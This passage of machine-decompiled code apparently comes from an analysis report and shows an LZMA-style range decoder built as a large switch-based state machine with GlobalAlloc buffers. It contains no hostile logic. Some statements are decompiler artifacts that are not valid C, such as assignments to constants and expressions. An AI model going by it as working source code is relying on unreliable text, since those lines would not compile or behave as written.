													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
